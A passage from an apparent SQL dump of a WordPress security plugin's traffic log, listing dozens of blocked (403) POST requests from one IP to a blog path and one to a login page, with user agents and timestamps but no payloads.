FBSMTWB\"}','62gNcWuzTwbSD7yvMirORlhx',0,1637216069.7872,387,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','UBAC8mXliEM2qw0NhjroGt1f',0,1637216070.8188,123,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WxgP5fsFJpyRkuNaBIon3CEX',0,1637216072.0107,385,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','GCVQBa3E65hWqv9pjoRJOynu',0,1637216073.4081,394,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','QEkPwsdYt9bCUpcKAW3jfZ5a',0,1637216074.6983,393,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Oqg9PwAh7kMxUSNlWdHFstLR',0,1637216076.0982,405,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WxjNfwF4zvOXSnJ0yAo7K8DH',0,1637216077.4748,418,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','lFp6YsNuh0MgdHtKfW91yCzV',0,1637216078.9841,675,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','nMe0EcJGq5uAxoF3U6BT92hC',0,1637216080.9094,386,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','URbnMTuvcYLSqwilDVpErdN1',0,1637216082.0446,418,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','mtvXGfwk2L8H9eSgxpQDdh4U',0,1637216083.2223,378,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','6h3Td8ZrtHboCkN0QqPXiBJa',0,1637216084.3648,395,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','au2ZHeM0BXlxdjAfNpy5wKi8',0,1637216085.8032,1233,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','eolBj9XpbKqUTNtWEIVZ74x8',0,1637216087.9533,401,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','EbI8CNmZxfnhQW35qjAsYv9g',0,1637216089.2253,418,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','j1BAHf5GrCJq4703mwZxpyl9',0,1637216090.2168,414,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','0qXZbfgwrkEOHCMWnmV341RN',0,1637216091.2031,421,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','UEAwqGdy3t1jT8ZgBV6RreJs',0,1637216092.5777,379,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','j4aFWRmE9LrzB1u32lYDU0gp',0,1637216093.9624,394,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','9trGAvLIP0caFiXJdke615Zy',0,1637216095.0981,419,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','pg0xEHwDVIdhks6KoFbRLX2A',0,1637216096.6882,759,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','oWk2cg49AdRiwPeOHJrVv5nZ',0,1637216098.1411,429,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','7q4huofcNbX9ixkyzTjApBUa',0,1637216099.3968,457,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','T82BuHPVFgo4hjKOI19mr5b6',0,1637216100.5879,385,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','eMKUHytBJTvP2QCzcjrq7oua',0,1637216101.9078,422,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','vCrzSUTtuoi6XcB8jJfhE4LI',0,1637216103.5099,402,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','HmPwrvGjNURSxCy5JoeuQ3hO',0,1637216104.7267,381,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','oA2tf83KiQvSlMZ7DrPwsTeg',0,1637216106.0322,378,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','RYcvdiNfb3Lj6nmTJSMFAaC5',0,1637216107.0516,419,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','AlDFejb2z3osNW8BSdfgv6Oh',0,1637216108.3983,397,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','msEgyw92WULZc617ApMeVuCl',0,1637216109.5234,437,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','1pILojg3RcmVyi9WxUETJea8',0,1637216110.9305,373,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','bnHeXS793OpuN6JmcjBQviCz',0,1637216112.8482,414,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Cwr1RKV2IcHpahAuibMldSf9',0,1637216114.1908,391,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','8EjlfUFzy9A1uKMcVgmT5aN3',0,1637216116.0638,388,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','xrQg1vERF3eUzhXM5uk6c4aY',0,1637216117.5490,396,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','oAnt8xi9Wp0cXDhNj4PIsBUr',0,1637216118.6958,426,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','XZ5bCBWclnYh79v2jJAaTSEH',0,1637216120.0847,443,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','EYsRPb6NtjGSgqz8QCi2HXxk',0,1637216121.8925,411,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','uePC6Q32DZJtdYjBsUxVIvLK',0,1637216123.1253,376,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','W1CxbBrl69DTPgKkSFU7JOdV',0,1637216124.7878,140,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','QwEzHr4clBRv7Y5S9NneLhGm',0,1637216126.0105,392,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','293ZDCEzpSo4rYi1bN06Gdsa',0,1637216127.1841,413,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','XTyGEhp6D897aOUjBtPlY1HZ',0,1637216128.3970,411,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','JMrAY4jGcVilZnWm63qvf1X5',0,1637216129.6803,418,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','6IlLMYXjtEihoqdWTzgpaQ4D',0,1637216130.9805,124,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','QYWDslVrBez8pCZUxm1NbcG6',0,1637216132.3674,383,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','hQJ4MlUkqF5DzH9fP2grteEO',0,1637216134.0431,443,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','AUuG2SsDMm7ktlWbyK3CZc1f',0,1637216135.9093,397,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','DvrymGPKMqb38scOfoud5hj0',0,1637216137.1318,438,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','IdqiTPBCz9DHkYgh3jmcnEyL',0,1637216138.4693,445,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','InprbCyAkRh3iPKEXv1qJcB4',0,1637216139.6844,411,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','HuqeO0zlxWZ2n3bRw6GSo9Lr',0,1637216141.2239,399,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','pJUDHeQEWVswfucABz2PtlKx',0,1637216142.6158,403,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WzTYsSex1icbVF7LI50nHmgE',0,1637216144.1342,618,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ZbUaEHv8nTLAGjFWCYoec3rq',0,1637216145.5704,404,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ziM2hfuyl91ZKNLgjpAkSGY7',0,1637216146.8319,417,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','db6pO894X2jcMLF1YTVCsqao',0,1637216148.6913,405,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','BKCRp1Qhuwg7jdoyU9TYEzAl',0,1637216150.3874,391,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','n7yoXbDl2rFpxvHc6z0gZUes',0,1637216151.8272,403,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','oMbU37dk5gAhQaTFz4rj8esB',0,1637216153.0248,412,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','sBAt3HD5vmNnL4Ve0p1oEaRx',0,1637216154.6784,417,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','4vNTm1t8XUspMBlEfeconF5S',0,1637216155.9446,395,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','vgPKjJsBkwanlNdUbWT0qRuZ',0,1637216157.5791,414,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','uv3HlwG8nWJbjkPXRQczFAfS',0,1637216158.9529,434,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','TNgcitW5HVZQmI1JzhXlwkGd',0,1637216160.4559,1354,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','KEet5kOdMpX9zHbvlJ78VqnI',0,1637216162.5512,434,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','mwfnW2p3yS7uHQDctdvIE8Ti',0,1637216163.6584,452,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','IzPEH7MO1tjYLQU4W2np5exv',0,1637216164.8564,453,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','jFkYeKr0vtEzOZSRVwUXclM9',0,1637216166.6247,449,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','lmIX5UecF3Z6KVLz1nbPdOCH',0,1637216168.2397,828,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','OSJVZQNirAfampC04h7s6FDK',0,1637216170.0099,450,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','axnOdi3AvjHbgYMXpfP25JhQ',0,1637216171.3196,857,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ylKWCpw9ukO0m4erfoDEjHRU',0,1637216173.1566,1577,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','6cn0pGUt78XvYEa2S14qRWMP',0,1637216175.7883,455,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WmPvozknGfZ3Y5NXTVDlu9jR',0,1637216177.5506,456,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','gO2b1klnTzmiE5XLotBfFuSh',0,1637216178.9092,452,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','mGN7aRICwjqAgzTY1QcFtHZL',0,1637216180.5403,478,'','POST',403,0,700,0,1,'',0),('69.30.217.109',1159649645,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','rFMoPflhcD2sYVHAyedWKngI',0,1637216182.0682,476,'','POST',403,0,600,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','0mANfO6xwqdbkpvKCTBgDjYl',0,1637216182.2047,430,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','likTaqv8bOEYsVzgCZNue1p4',0,1637216183.4401,433,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','eHTuj3vDzdy2ax7tnJWrKsZ6',0,1637216184.4852,429,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','A5ELoQZ7BjXD9kJy8KMIexda',0,1637216185.9110,490,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 